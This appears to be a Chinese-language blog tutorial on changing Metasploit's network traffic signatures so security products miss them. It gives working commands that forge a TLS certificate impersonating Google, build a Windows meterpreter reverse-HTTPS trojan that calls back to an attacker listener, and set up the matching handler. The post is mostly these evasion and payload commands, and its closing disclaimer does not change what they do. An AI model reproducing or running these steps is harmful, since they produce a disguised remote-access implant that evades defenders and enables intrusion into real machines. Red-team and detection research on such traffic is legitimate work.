msf流量通讯特征修改

众所周知msf在安全界的地位,那么它的特征安全厂商肯定是抓的死死的,所以我们需要相应的修改一下。

使用openssl生成证书。

对于openssl这个软件,kali自带。

输入如下命令;

openssl req -new -newkey rsa:4096 -days 365 -nodes -x509 \
-subj "/C=US/ST=London/L=London/O=Google Trust Services LLC/CN=www.google.com" \
-keyout www.google.com.key \
-out www.google.com.crt && \
cat www.google.com.key www.google.com.crt > www.google.com.pem && \
rm -f www.google.com.key www.google.com.crt
CN=(名字与姓氏), OU=(组织单位名称), O=(组织名称), L=(城市或区域名称), ST=(州或省份名称), C=(单位的两字母国家代码

参数详解;

-new 指生成证书请求

-nodes 表示私钥不加密,若不带参数将提示输入密码;

-x509表示输出证书;

-days365 为有效期;

-x509 表示直接输出证书;

-subj选项执行自动输入;

msf流量通讯特征修改

 

以上便生成了一个伪谷歌证书了,让msf用上该证书。

首先生成配置该证书的木马文件。

msfvenom -p windows/meterpreter/reverse_winhttps LHOST=192.168.1.131 LPORT=443 PayloadUUIDTracking=true HandlerSSLCert=www.google.com.pem StagerVerifySSLCert=true PayloadUUIDName=ParanoidStagedPSH -f exe -o p.exe

 将该木马上传到虚拟机上抓包

进入msfconsole,进行如下配置:

use exploit/multi/handler

set payload windows/meterpreter/reverse_winhttps

set lhost 0.0.0.0

set lport 443

set HandlerSSLCert www.google.com.pem

set StagerVerifySSLCert true

run

msf流量通讯特征修改

 执行并抓包:

msf流量通讯特征修改

 经过加密的数据包,并且自定义证书。

声明:本文所涉及的技术、思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途,否则后果自行承担!!!

上一篇:使用percona工具升级数据库


下一篇:go流水线编程模式,它和我们熟悉的生产者-消费者模式非常相似